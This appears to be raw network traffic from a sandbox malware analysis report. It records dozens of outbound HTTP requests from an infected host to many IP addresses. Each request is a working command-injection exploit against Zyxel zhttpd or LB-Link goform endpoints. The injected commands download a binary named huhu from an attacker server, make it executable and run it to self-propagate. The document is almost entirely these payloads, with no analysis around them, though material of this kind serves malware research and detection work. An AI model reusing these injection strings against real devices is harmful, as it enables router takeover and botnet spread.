                                              Jan 29, 2024 07:04:02.260134935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7537192.168.2.143333634.55.236.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260185003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7538192.168.2.143913672.203.220.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260205030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7539192.168.2.1433250104.252.180.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260242939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7540192.168.2.143494017.238.106.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260271072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7541192.168.2.145697662.97.5.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260307074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7542192.168.2.1444622156.148.1.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260369062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7543192.168.2.1433406198.76.39.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260406017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7544192.168.2.1455938175.124.212.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260423899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7545192.168.2.145008639.91.166.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260461092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7546192.168.2.145650248.248.57.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260507107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7547192.168.2.1442562209.34.6.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260531902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7548192.168.2.143539627.32.211.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260580063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7549192.168.2.1460292190.195.189.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260612011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7550192.168.2.1456090165.212.23.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260643005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7551192.168.2.1440470191.87.189.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260690928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7552192.168.2.144388620.251.15.1998080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.646411896 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7553192.168.2.1438290103.219.223.1548080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.770133972 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:02.887183905 CET373INHTTP/1.1 301 Moved Permanently
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: frame-ancestors 'self'
                                              X-XSS-Protection: 1; mode=block
                                              Strict-Transport-Security: max-age=0
                                              location: https://undefined:9443/goform/set_LimitClient_cfg
                                              Date: Mon, 29 Jan 2024 06:04:02 GMT
                                              Connection: keep-alive
                                              Keep-Alive: timeout=5
                                              Transfer-Encoding: chunked
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7554192.168.2.1458432138.201.122.1438080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.066276073 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:03.269774914 CET1286INHTTP/1.1 400
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1127
                                              Date: Mon, 29 Jan 2024 06:04:02 GMT
                                              Connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 33 3c 2f 68 33 3e 3c 2f 62 6f 64
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><hr class="line" /><h3>Apache Tomcat/8.5.43</h3></bod


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7555192.168.2.1444164191.23.57.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.272809029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7556192.168.2.1453686112.97.56.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.272840023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7557192.168.2.144197612.42.232.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.272886992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7558192.168.2.145047427.15.17.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.272927999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7559192.168.2.144945423.114.118.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.272985935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7560192.168.2.1442988211.141.184.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273039103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7561192.168.2.1459508162.234.115.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273046970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7562192.168.2.1460936195.146.179.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273118973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7563192.168.2.1448040169.124.48.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273150921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7564192.168.2.1442054133.118.125.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273163080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7565192.168.2.1447500168.133.79.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273235083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7566192.168.2.1451962191.143.147.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273277044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7567192.168.2.1445098116.139.247.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273322105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7568192.168.2.144709445.57.160.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273359060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7569192.168.2.1453816131.59.203.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273386002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7570192.168.2.1439028155.145.127.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273431063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7571192.168.2.1458878191.149.105.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273458004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7572192.168.2.143509032.47.240.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273494959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7573192.168.2.145057669.8.12.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273546934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7574192.168.2.1434176112.58.209.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273578882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7575192.168.2.1449770134.94.48.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273633957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7576192.168.2.1446518199.28.65.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273669958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7577192.168.2.1446934143.56.207.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273701906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7578192.168.2.143963840.110.48.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273746014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7579192.168.2.145395287.207.110.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273802996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7580192.168.2.1441590195.75.176.127443
